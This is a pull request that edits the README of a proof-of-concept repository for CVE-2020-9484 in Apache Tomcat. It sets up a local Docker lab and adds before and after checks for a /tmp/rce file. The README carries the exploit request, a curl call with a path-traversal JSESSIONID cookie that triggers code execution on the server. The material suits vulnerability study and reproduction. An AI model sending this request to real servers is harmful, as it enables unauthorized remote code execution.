### PR TITLE
Updated readme

### DIFF
--- a/README.md
+++ b/README.md
@@ -10,16 +10,22 @@ See Reference for the details.
 $ git clone https://github.com/masahiro331/CVE-2020-9484.git
 $ cd CVE-2020-9484
 $ docker build -t tomcat:groovy .
-$ docker run -d -p 8080:8080 tomcat:groovy
+$ CONTAINER=`docker run -d -p 8080:8080 tomcat:groovy`
 ```
+
+## Check (clean)
+```
+$ docker exec -it $CONTAINER ls -la /tmp
+```
+**NOTE:** (`rce` NOT in output)
 
 ## Exploit
 ```
 $ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'
 ```
 
-## Check
+## Check (exploited)
 ```
-$ docker exec -it $CONTAINER /bin/sh
-$ ls /tmp/rce
+$ docker exec -it $CONTAINER ls -la /tmp
 ```
+**NOTE:** (`rce` IS in output)


### PR DESCRIPTION
* Capture CONTAINER variable from `docker run...` output
* Add a check pre-exploit to show `rce` not in /tmp